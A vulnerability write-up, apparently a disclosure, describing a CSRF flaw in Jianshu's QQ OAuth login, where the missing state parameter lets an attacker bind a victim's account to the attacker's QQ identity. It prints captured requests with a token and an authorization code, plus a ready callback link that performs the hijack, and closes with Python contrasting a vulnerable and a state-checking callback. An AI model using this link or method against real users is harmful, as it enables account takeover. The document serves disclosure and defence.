Jianshu OAuth CSRF account-binding hijack

0x00 Introduction

During Jianshu's OAuth 2.0 flow there is no state parameter to defend against CSRF, so an attacker can use CSRF to bind a user's Jianshu account to the attacker's own (QQ) account.

0x01 Process

Click "Log in with QQ".

GET /users/auth/qq_connect HTTP/1.1
Host: www.jianshu.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.jianshu.com/sign_in
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxx

You are then redirected automatically to the QQ authorization page, which asks you to log in. The parameters of that request are:
client_id: the application id (Jianshu)
redirect_uri: the callback address after successful authorization
response_type: the grant type; here the value is code (Authorization Code grant)
state: used to defend against CSRF
scope: permission control

GET /oauth2.0/authorize?client_id=100410602&redirect_uri=http%3A%2F%2Fwww.jianshu.com%2Fusers%2Fauth%2Fqq_connect%2Fcallback&response_type=code HTTP/1.1
Host: graph.qq.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.jianshu.com/sign_in
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxx

Many steps are omitted here; they are all part of the QQ login process. At the step below (g_tk is the equivalent of QQ's API token, and data can be fetched with it), the request effectively authorizes Jianshu to log in. In the QQ Connect management center you will see that your QQ account has been authorized to Jianshu.

POST /oauth2.0/authorize HTTP/1.1
Host: graph.qq.com
Connection: close
Content-Length: 272
Cache-Control: max-age=0
Origin: https://graph.qq.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://graph.qq.com/oauth2.0/show?which=Login&display=pc&client_id=100410602&redirect_uri=http%3A%2F%2Fwww.jianshu.com%2Fusers%2Fauth%2Fqq_connect%2Fcallback&response_type=code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxx

response_type=code&client_id=100410602&redirect_uri=http%3A%2F%2Fwww.jianshu.com%2Fusers%2Fauth%2Fqq_connect%2Fcallback&scope=&state=&switch=&from_ptlogin=1&src=1&update_auth=1&openapi=80901010&g_tk=581224646&auth_time=1525967202765&ui=1FF7E879-E46A-4585-A5B1-40C28D1278B3

Finally the authorization code is obtained.

GET /users/auth/qq_connect/callback?code=C1F69740B7B8281EA22B88FD8A4F044F HTTP/1.1
Host: www.jianshu.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: xxxxxxxxxxxxxxxxxxxxxxxx

The next steps cannot be captured by us (exchanging the authorization code for an access token, then using the access token to access QQ resources).

Having obtained the QQ authorization code: if the victim is logged in to Jianshu and visits the link below, the victim's Jianshu account will be bound to that QQ account.

https://www.jianshu.com/users/auth/qq_connect/callback?code=C1F69740B7B8281EA22B88FD8A4F044F

Logging in to Jianshu directly with QQ follows the same steps.
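The defect above is that the callback accepts a code with no state check. The following is an added illustration, not Jianshu's code: it shows a callback that behaves as the page describes next to one that binds a random state to the user's session, verifies it with a constant-time comparison, and consumes it so the callback cannot be replayed. The session store, CLIENT_ID placeholder and function names are constructed for the example.

```python
import hmac
import secrets
import urllib.parse

# Constructed stand-in for the server-side session store of a logged-in user.
SESSIONS = {}
CALLBACK = "https://www.jianshu.com/users/auth/qq_connect/callback"
CLIENT_ID = "APP_ID_PLACEHOLDER"  # hypothetical; the real app id is not needed here


def begin_oauth(session_id):
    """Build the redirect to graph.qq.com with a fresh state bound to this session."""
    state = secrets.token_urlsafe(32)
    SESSIONS.setdefault(session_id, {})["oauth_state"] = state
    query = urllib.parse.urlencode({
        "client_id": CLIENT_ID,
        "redirect_uri": CALLBACK,
        "response_type": "code",
        "state": state,
    })
    return "https://graph.qq.com/oauth2.0/authorize?" + query


def state_from_redirect(url):
    """Extract the state the client placed in the redirect (used by the checks)."""
    return urllib.parse.parse_qs(urllib.parse.urlparse(url).query)["state"][0]


def vulnerable_callback(session_id, query):
    """The behaviour the page describes: code is accepted with no state check,
    so a victim who follows a link carrying someone else's code gets their
    session bound to that QQ identity."""
    code = query.get("code")
    if not code:
        return "error: missing code"
    return f"bound: code {code} linked to session {session_id}"


def hardened_callback(session_id, query):
    """Accept the code only if state matches the value issued to this session.
    The stored state is consumed on first use so the callback cannot be replayed."""
    expected = SESSIONS.get(session_id, {}).pop("oauth_state", None)
    received = query.get("state", "")
    if not expected or not hmac.compare_digest(expected.encode(), received.encode()):
        return "error: state mismatch, callback rejected"
    code = query.get("code")
    if not code:
        return "error: missing code"
    return f"bound: code {code} linked to session {session_id}"
```

A session that never started the flow has no stored state, so a forged callback link like the one shown above is rejected outright by the hardened version.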

Screenshot